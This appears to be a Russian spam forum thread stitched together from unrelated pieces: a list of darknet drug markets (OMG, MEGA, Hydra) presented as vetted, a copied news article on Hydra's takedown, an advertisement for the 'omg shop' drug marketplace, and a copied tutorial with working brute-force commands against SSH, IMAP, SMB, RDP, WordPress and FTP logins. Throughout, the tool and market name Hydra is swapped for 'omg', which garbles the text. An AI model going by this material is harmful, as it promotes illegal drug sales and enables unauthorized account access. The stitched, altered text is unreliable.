Рамп онион сайт не работает

Asevycof

Специалист
Подтвержденный
Сообщения
837
Реакции
50
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



T

Tunihe

Юзер
Сообщения
88
Реакции
15
Рамп онион сайт не работает
ГлавноеРоссияМирБывший СССРЭкономикаСиловые структурыНаука и техникаКультураСпортИнтернет и СМИЦенностиПутешествияИз жизниСреда обитанияЗабота о зайти себеВойтиСтатьиГалереиВидеоСпецпроектыМоторЛента добраХочешь видеть только хорошие новости?Жми!Вернутьсяв обычную ленту?ВойтиИнтернет и СМИВсеИнтернетКиберпреступностьCoцсетиМемыРекламаПрессаТВ и радиоФактчекинг00:02, 6 апреля2022Интернет и СМИНемецкая полиция отключила «Гидру».Что будет дальше с крупнейшим вмире магазином наркотиков?Фото: Martin Meissner / AP1Немецкие силовики заявили облокировке «Гидры»Рано утром 5 апрелякрупнейшая даркнет-площадка по продаже наркотиков «ОМГ» пересталазагружаться у всех пользователей. Официальный представитель ресурсана одном из теневых форумов подтвердил наличие проблем с доступом иотметил, что техники пытаются их решить. Однако уже через несколькочасов стало понятно, что «ОМГ» недоступна не из-за простыхнеполадок.

«Центральное управление по борьбе с киберпреступностью прокуратурыФранкфурта-на-Майне и Федеральное управление уголовной полицииГермании отключили расположенную на территории страны сервернуюинфраструктуру крупнейшего в мире нелегального даркнет-рынка"ОМГ". Таким образом, его деятельность прекращена. Также быликонфискованы биткоины на сумму, эквивалентную примерно 23 миллионамевро», — заявили сами силовики.

На площадке на некоторое время появился баннер, в которомполицейские на нескольких языках отрапортовали о конфискацииплатформы и ее «криминального содержимого». После этого «ОМГ» ивсе ее зеркала окончательно отключились. Вечером появиласьинформация о том, что атака на «Гидру» — часть санкционной политикиЗапада. Кроме того, площадку обвинили в связях с несколькими хакерскимигруппировками.Таким гротескным баннером немецкаяполиция проводила «Гидру» в последний путьИзображение: BKA2Представители «Гидры»утверждают, что магазин восстановит работуВ отсутствие связи садминистраторами «Гидры» на самой площадке обитатели даркнетаобрушились с вопросами на представителя маркетплейса на одном издаркнет-форумов. Через два часа после блокировки пользователь сником omg support емко написал: «Не переживайте, восстановим».Вскоре представитель «Гидры» добавил подробностей: «Работа ресурсабудет восстановлена, несмотря ни на что. (...) Но нужно время». Онтакже заверил, что после восстановления работы нелегальногомаркетплейса баланс каждого пользователя будет таким же, каким онбыл до блокировки.

После этого рупор «Гидры» заявил о том, что «сроки восстановленияработоспособности проекта будут озвучены в течение дня». К моментувыхода материала этого не случилось. При этом ни в одном своемсообщении omg support не подтвердил сам факт ареста серверовплощадки в Германии.

Многие пользователи тор на даркнет-форумах предполагают, что на самомделе немецкая полиция смогла лишь арестовать серверы, которыеоказались зашифрованными, из-за чего получить доступ к ихсодержимому не удалось. После этого, по мнению завсегдатаев теневыхресурсов, было принято решение об отключении серверов и,соответственно, основной инфраструктуры «Гидры».3Работу всех магазинов на «Гидре»приостановилиКак удалось выяснить«Ленте.ру», работа всех магазинов на «Гидре» поставлена на паузу.Все сотрудники получили указания не предпринимать никаких действий.«В районе обеда нам дали понять, что ничего критичного непроизошло, так как у площадки много серверов. Связь с сотрудникамимы держим в альтернативных мессенджерах с высоким уровнеманонимности. Через саму "Гидру" ключевые рабочие вопросы никогда ине решались. Прорабатываются ли альтернативные варианты развитиясобытий? Да», — рассказал «Ленте.ру» на условиях анонимностиоператор одного из магазинов.

Ближе к вечеру 5 апреля отдельные магазины заявили о начале продажв закрытых Telegram-каналах. По словам представителя одного из них,это связано с тем, что «ОМГ» будет восстанавливаться достаточнодолго: «Крупные магазины уже перекладывают опт (меняют местазакладок с оптовыми партиями наркотиков — прим. «Ленты.ру»)."ОМГ" восстанавливает данные с резервного сервера — этот процессбудет долгим, займет не одну неделю. "ОМГ" будет работать, но,скорее всего, с нуля», — сказано в сообщении представителя одногоиз таких магазинов на теневом форуме.Рядовые пользователиплатформы на различных ресурсах и в Telegram-каналах уже пытаютсявыведать, существуют ли альтернативные площадки, на которых можнооперативно купить запрещенные вещества (такие площадки существуют,однако многие их пользователи отмечают, что они проигрывают «Гидре»в оперативности и ассортименте). Другие переживают о деньгах,которые оставались на их счетах в даркнет-маркете, и гадают,удастся ли их вывести после восстановления работоспособностиресурса. В том, что «ОМГ» скоро вернется, практически никтовсерьез не сомневается. Это не мешает активизации небольшихплощадок, которые в последние месяцы или даже годы либо оставалисьв тени «Гидры», либо фактически не работали, оставаясь доступными вдаркнете. О начале (или возобновлении) работы сообщили в двухмаркетплейсах наркотиков, один из которых работает по всей стране,другой — только в Москве.Фото: Michele Tantussi /Reuters4Сколько денег потеряла«ОМГ»Авторитетный Telegram-каналDrugStat, занимающийся в том числе аналитикой экономическихпоказателей российского онлайн-рынка оборота наркотиков, подтвердилинформацию о выводе основной части средств с кошельков, связанных с«Гидрой»: «Очень важно, что мы подтверждаем только этот факт. Мы неподтверждаем другую информацию. Потому что даже в пресс-релизенемецких силовиков есть ошибки».

По данным криптовалютной площадки Blockchain.com, на один изкошельков ранним утром 5 апреля почти сотней отдельных транзакцийбыли выведены более 543 биткоинов (примерно2,12 миллиарда рублей, те самые 23 миллиона евро) с адресов,начинающихся с цифры 3, — именно так выглядят кошелькипользователей «Гидры» (не только они, но они в том числе). При этомDrugStat не подтвердил ни информацию о том, что за выводом стоялинемецкие полицейские, ни сведения об аресте владельцев «Гидры».Вечером 5 апреля были проведены еще несколько транзакций на этоткошелек.5Как растет «ОМГ»Площадка «ОМГ» появиласьв российском сегменте даркнета в 2015 году. В ходе жесткойконкурентной борьбы ресурс вытеснил с рынка торговую площадку RAMP,после чего стал фактически монополистом в сфере нелегальногооборота наркотиков. По оценкам немецких силовиков, в 2020 году на«Гидре» продали незаконных веществ на сумму в 1,23миллиарда евро.

Эти данные подтверждаются исследованиями аналитиков Flashpoint,которые подсчитали, что общая ежегодная сумма транзакций наплощадке выросла с 9,4 миллиона долларов в 2016 году до1,37 миллиарда долларов в 2020-м. В том же году на долю «Гидры»пришлось 18,4 процента от мирового оборотанезаконной криптовалюты (772 миллиона долларов). Чуть позднее«ОМГ» начала экспансию в страны СНГ.Фото: Fabian Bimmer / ReutersСама платформа представляетсобой маркетплейс, на котором расположены магазины по продаженаркотиков. Каждый из них предлагает покупателю свой ассортимент,при этом сами магазины представлены в разных городах России. Послетого как пользователь оплатил товар биткоинами (на «Гидре» естьвстроенные обменники), он получает адрес места, в котором егоожидает закладка с веществом. Процесс оптимизирован настолько, чтосама покупка занимает в среднем 5-7 минут.

Помимо наркотиков на площадке продаются фальшивые деньги,поддельные паспорта и удостоверения сотрудников различных структур(в том числе ФСБ), банковские карты, оформленные на «мертвые души»,рецептурные медицинские препараты и реактивы, необходимые дляпромышленного производства запрещенных веществ. В 2019 году«Лента.ру» выпустила спецпроект «Россия поднаркотиками», посвященный работе «Гидры».6Кто стоит за «Гидрой»Год назад, в феврале2021-го, разработчиков «Гидры» попытались деанонимизировать.Неизвестный хакер выложил на уже не существующем ресурсе результатысвоего расследования, в рамках которого он проанализировалфрагменты кода площадки, оказавшиеся в открытом доступе послеDDoS-атаки. По его данным, за разработкой «Гидры» стоят дваукраинских программиста, имена которых были преданы огласке. Сами техническиеспециалисты заявили о своей непричастности к проекту. Украинскаяполиция о начале каких-либо следственных действий не сообщала.Вениамин ЛыковКомментарииотключеныЕсть что скрывать. Что на самом деле происходит в даркнете —неизвестном простым россиянам интернете?«Произошла настоящая революция»В России происходит передел рынканаркотиков в даркнете. Чем это грозит жителям страны?«На хвосте не только копы, но и весьмир»Как в даркнете начался переделрынка наркотиков после падения «Гидры»«Не надо было угрожать моейстране»Хакеры Killnet защищают Россию,сражаясь с Anonymous и НАТО. Кто за ними стоит?Еще материалы циклаПоследние новости«Северный поток-2» назвали фактически мертвымпосле начала спецоперации России16:54Диетолог назвала опасность плавленого сыра длянекоторых людей17:49Режиссера фильма «Не время умирать» обвинили вдомогательствах17:45НаЯшина составили четыре протокола о дискредитации российскойармии17:38Минздрав оценил вероятность появления новыхштаммов коронавируса17:37Одна изсамых безопасных стран мира откроет границы для россиян17:35Сталаизвестна дата принятия Финляндией решения по вступлению вНАТО17:32Польшузаподозрили в провоцировании глобальной войны с Россией17:32Российский врач назвала способ есть сладкое ихудеть17:32Молдавских депутатов решили наказать за ношениегеоргиевской ленты17:31Все новостиПопулярные новостиВероятность экстрадиции знатока «Что? Где?Когда?» в Россию оценили17:09Минобороны заявило об экспериментах США надлюдьми в психбольнице под Харьковом16:22ВРоссии подешевели компьютеры17:01Расстрелявшего пятерых человек россиянинаприговорили к пожизненному сроку16:50Названапричина смерти умершего на сеансе шаманов экс-топ-менеджера«Лукойла»17:06США иБолгария договорились о поставках газа16:31«Северный поток-2» назвали фактически мертвымпосле начала спецоперации России16:54РедакцияРекламаПресс-релизыТехподдержкаСпецпроектыВакансииRSSОзвучка материалов© 1999–2022 ООО «Лента.Ру»Нашли опечатку? НажмитеCtrl+Enter18+Лента добрадеактивирована.Добро пожаловать в реальныймир.
 

Tazoj

Пассажир
Сообщения
81
Реакции
16
Academia del Motor usa cookies para así ofrecerte la mejor experiencia de navegación posible. Si sigues navegando sin cambiar tus ajustes de cookies o haces clic en "Aceptar" estarás dando tu consentimiento a la utilización de cookies. En caso de que no las aceptes, nuestro contenido podría sufrir variaciones y se podrá tener una mala experiencia en la web. Puedes obtener más información y leer nuestra política de cookies aquí.
Рамп онион сайт не работает
 

Ylegihub

Юзер
Сообщения
120
Реакции
2
Наша команда приветствует вас на официальной статье сайте омг, если вы искали зеркала, ссылки, адреса, домены то вы находитесь там где нужно!Все официальные адреса сайта omgДля того чтобы всегда попадать только на официальные зеркала omg shop, вам необходимо вооружиться информацией. Прежде чем мы перейдем к списку доменов, мы хотим рассказать вам о важности знания настоящих ссылок, не секрет что существует масса различных паразитов нашего сайта. omg shop настолько огромный и всеобъятный, что только ленивый не сделал на него фейк, поэтому будьте осторожны и всегда перепроверяйте адреса по которым вы переходите, особенно при пополнении личного баланса биткоин. Ниже для вас опубликованы настоящие зеркала магазин наркотиков и нелегальных услуг:Также помимо различных фейков и мошенников, на криптомаркет запрещенки из-за своей популярности по всей России, часто пытается прикрыть роскомнадзор! Именно поэтому существую домены .onion, ведь в даркнете уже намного тяжелее властям вставлять нам палки в колеса. Попасть по такой ссылке на omg site, можно скачав Tor browser и скопировав ссылку в новоустановленный браузер - tor browser project. Поэтому в случай если какой-либо домен не доступен когда вы его пытаетесь посетить, возможно выдает ошибку или попросту белый экран, есть вероятность того что его прикрыли власти или же мы сражаемся с очередной ДДОС-атакой, в такие моменты лучше всего ипользовать tor omg и использовать onion links:Немного о omg shopomg shop - это крупнейший черный криптомаркет, где работает огромное количество продавцов и с каждым днем всё больше и больше покупателей. Всвязи со спецевичностью товара, многие клиенты переживают о своих личных данных и средствах, но команда проекта omg создала двухфакторное шифрование данных аккаунтов, которая предотвратит любую попытку взлома.
Сервисы магазина запрещенки постоянно совершенствуются и набираются опыта, наш магазин растет и товар с каждым днем пополняется новыми видами услуг и наркотиков. Наша команда тщательно следит за качеством продаваемого товара путем покупки у случайно выбранных продавцов их услуг, все проверяется и проводится анализ, все магазины с недопустимой нормой качества - удаляются из omg site!Также есть необходимость сохранить к себе в браузер настоящие ссылки гидры, чтобы иметь возможность всегда попасть в ваш любимый магазин.Если вы нуждаетесь в большей информации, то мы рекомендуем вам посетить различные статьи посвещенные часто задаваемым вопросам. Перейти к мануалам. На сайте полным-полно различных статей, вам лишь необходимо найти ту что вам нужно, на официальном сайте присутствуют много статей, вы можете получить информацию от того как зайти на гидру онион до того как совершить первую покупку на гидре.После того как вы стали чуть умнее и научилсь пользовать тор гидрой, мы хотим пожелать вам приятных покупок и хорошоге времяприпровождения, не попадайтесь в руки мошенникам и перепроверяйте все линки по которым вы переходите, всего хорошего!Теги:чёрный магазин, наркомаркет, официальные адреса омг, как зайти на онион гидру
 

Onacod

Юзер
Сообщения
65
Реакции
8
Brute-force (атака полным перебором) обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису. Рассмотрим инструменты, которые можно использовать для выполнения атак методом перебора: omg 8.6, Medusa 2.2, Patator 0.7 и Metasploit Framework 4.17.17-dev, входящие в состав Kali Linux 2019.1. В зависимости от поддерживаемых протоколов будем использовать наиболее подходящие инструменты. Словарь паролей и пользователей сгенерируем самостоятельно с использованием Crunch.Информация предназначена исключительно для ознакомления. Не нарушайте законодательство.CrunchСловарь с пользователями мы взяли небольшой и записали в него 4 пользователя.Для составления словаря используется Crunch, как встроенное средство. Инструмент гибкий и может составить словарь по определенной маске. Если есть вероятность того, что пользователь может использовать словарный пароль, то лучше воспользоваться уже готовыми решениями, тем более, что, как показывает практика, самый популярный пароль – 123456.Генерировать словарь будем на 5 символов по маске. Данный метод подходит для случаев, когда мы имеем представление о структуре пароля пользователя.crunch 5 5 qwe ASD 1234567890 -t @@,%@ -o /root/wordlist.txt5 – минимальное и максимальное количество символов;
qwe, ASD, 1234567890 – используемые символы;
-t – ключ, после которого указывается маска для составления пароля;
@ – нижний регистр;
, – верхний регистр;
% – цифры.Сразу отметим, что на первых этапах мы будем для каждого инструмента описывать используемые ключи, но далее те же самые ключи уже не будут рассматриваться подробно, поскольку они крайне похожи друг на друга, а значит, имеют аналогичный синтаксис.Patatorpatator ssh_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:mesg=’Authentication failed’ssh_login – модуль;
host – наша цель;
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора;
password – словарь с паролями;
-x ignore:mesg=’Authentication failed’ – не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.Все инструменты мы тестируем с количеством потоков по умолчанию, никаким образом их количество не изменяем.
Patator справился ровно за 7 минут 37 секунд, перебрав 2235 вариантов.omgomg -f -L /root/username -P /root/wordlist.txt ssh://192.168.60.50-f – остановка перебора после успешного подбора пары логин/пароль;
-L/-P – путь до словаря с пользователями/паролями;
ssh://IP-адрес – указание сервиса и IP-адреса жертвы.omg затратила на перебор 9 минут 11 секунд.Medusamedusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M ssh-h – IP-адрес целевой машины;
-U/-P – путь к словарям логинов/паролей;
-М – выбор нужного модуля.Medusa за 25 минут обработала только 715 комбинаций логин/пароль, поэтому данный инструмент не лучший выбор в случае с брутфорсом SSH.MetasploitПроизведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_loginЗадействуем модуль:
use auxiliary/scanner/ssh/ssh_loginДля просмотра необходимых параметров воспользуемся командой «show options». Для нас это:
rhosts – IP-адрес жертвы;
rport – порт;
user_file – путь до словаря с логинами;
pass_file – путь до словаря c паролями;
stop_on_success – остановка, как только найдется пара логин/пароль.По умолчанию Metasploit использует 1 поток, поэтому и скорость перебора с использованием этого модуля очень низкая. За 25 минут так и не удалось подобрать пароль.Patatorpatator imap_login host=192.168.100.109 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=1imap_login – используемый модуль;
-x – параметр, который помогает фильтровать ответы от Patator. В данном случае игнорируем ответы с кодом 1.Параметр х является уникальным для каждого конкретного случая, поэтому рекомендуется сначала запустить инструмент без него и посмотреть какие ответы в основном приходят, чтобы затем их игнорировать.В итоге Patator смог подобрать пароль за 9 минут 28 секунд, что является практически тем же самым показателем, что и в случае с SSH.omgomg -f imap://192.168.60.50 -L /root/username -P /root/wordlist.txtomg справилась за 10 минут 47 секунд, что довольно неплохо.MedusaВ связи с тем, что на сервере использовался самоподписанный сертификат, Medusa выдавала ошибку, исправить которую настройками инструмента не удалось.MetasploitВ Metasploit не удалось подобрать подходящий модуль для брутфорса IMAP.SMBPatatorПри использовании Patator появилось большое количество ложных срабатываний.omgomg -L /root/username -P /root/wordlist.txt 192.168.60.50 smbБлагодаря своим алгоритмам omg справилась с задачей всего за 5 секунд.Medusamedusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M smbntЗапуская перебор, я ожидал результатов, схожих с предыдущими, но на этот раз Medusa меня приятно удивила, отработав за считанные секунды.MetasploitС помощью поиска search smb_login находим нужный модуль scanner/smb/smb_login и применяем его.Необходимо указать параметры:
RHOSTS – IP-адрес жертвы;
USER_FILE – словарь с пользователями;
PASS_FILE – словарь с паролями;
STOP_ON_SUCCESS – остановка после подобранной пары логин/пароль.Metasploit справился с задачей за 1 минуту.RDPPatatorpatator rdp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=132К сожалению, на данный момент из тестируемых инструментов только Patator может подбирать логин/пароль для RDP-протокола. При этом, даже если Patator и справился с поставленной задачей, в выводе дополнительно появилось ложное срабатывание.WEBДля начала нам необходимо понять, как происходит процесс аутентификации.
Для этого нужно отправить тестовые запросы аутентификации и уже из поведения веб-приложения можно будет увидеть, что неверный пароль возвращает код ответа 200, а успешная аутентификация — 302. На эту информацию и будем опираться.PatatorУчитывая ответы веб-приложения на тестовые запросы, составим команду для запуска Patator:patator http_fuzz url=http://site.test.lan/wp-login.php method=POST body='log=FILE0&pwd=FILE1&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1' 0=/root/username 1=/root/wordlist.txt before_urls=http://site.test.lan/wp-login.php -x ignore:code=200 accept_cookie=1http_fuzz – модуль для brute-force атаки HTTP;
url – адрес страницы с аутентификацией;
FILE0 – путь до словаря с паролями;
body – информация, которая передается в POST запросе при аутентификацией;
-x – в данном случае мы указали команду не выводить на экран сообщения, содержащие параметр с кодом 200;
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос;
Итог — нам удалось подобрать пароль чуть менее, чем за 30 секунд, что очень быстро.omgКак мы уже знаем, при неверной аутентификации возвращается код 200, а при успешной — 302. Воспользуемся этой информацией и выполним команду:omg -f -L /root/username -P /root/wordlist.txt http-post-form://site.test.lan -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1:S=302"Здесь мы указываем обязательные параметры:
-f – завершить перебор после получения валидной пары логин/пароль;
-L – словарь с пользователями;
-P – словарь с паролями;
http-post-form – тип формы (в нашем случае POST);
/wp-login.php – URL страницы с аутентификацией;
^USER^ – показывает куда подставлять имя пользователя;
^PASS^ – показывает куда подставлять пароль из словаря;
S=302 – указание на какой ответ опираться omg (в нашем случае — ответ 302 при успешной аутентификации).Успех ожидал нас уже через 3 минуты 15 секунд.Medusamedusa -h site.test.lan -U /root/username -P /root/wordlist.txt -M web-form -m FORM:"/wp-login.php" -m FORM-DATA:"post?log=&pwd=&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1"К сожалению, при попытках перебора пароля Medusa выдает ошибку «Segmentation fault».MetasploitС помощью поиска search wordpress_login находим нужный модуль auxiliary/scanner/http/wordpress_login_enum и применяем его. Необходимо указать параметры:
PASS_FILE – словарь с паролями;
RHOSTS – адрес жертвы;
STOP_ON_SUCCESS – остановка после подобранной пары логин/пароль;
USER_FILE – словарь с пользователями;
VALIDATE_USERS – отключить проверку существования учетной записи пользователя;
VERBOSE – отключить лишний вывод;
VHOST – доменное имя атакуемого сайта.
Затраченное время — 32 секунды.FTPPatatorpatator ftp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=530В данном модуле Patator работает уже медленнее, чем с Web-формами, а пароль был подобран за 11 минут 20 секунд.omgomg -f -L /root/username -P /root/wordlist.txt ftp://192.168.60.50Работая по умолчанию в 16 потоков, omg смогла перебрать пароли за 7 минут 55 секунд.Metasploit, MedusaВ Metasploit используем модуль auxiliary/scanner/ftp/ftp_loginВ случае с Medusa запрос выглядит следующим образом:
medusa -f -M ftp -U /root/username -P /root/wordlist.txt -h 192.168.60.50Все параметры стандартные, указываем путь до словарей и обязательно ставим завершение перебора после найденной пары логин/пароль.
С этим протоколом, как и c SSH, Metasploit и Medusa плохо справляются при стандартном количестве потоков. Поэтому если есть желание использовать именно эти инструменты, то необходимо вручную увеличивать количество потоков. Но и тут не все так просто. В однопоточном режиме FTP-сервер при использовании этих инструментов, сбросил соединение, чего не наблюдалось при использовании Patator или omg. Поэтому есть вероятность, что увеличение количества потоков не изменит ситуацию.Заключение.Протестировав разные, но в то же время похожие инструменты на различных сервисах, можно сказать, что у каждого из них есть как достоинства, так и недостатки, а с каким инструментом работать — решать только вам.Ниже представлена сводная таблица с полученными результатами:P.S. Потренироваться можно в наших лабораториях lab.pentestit.ru.
 

Похожие темы

Сверху Снизу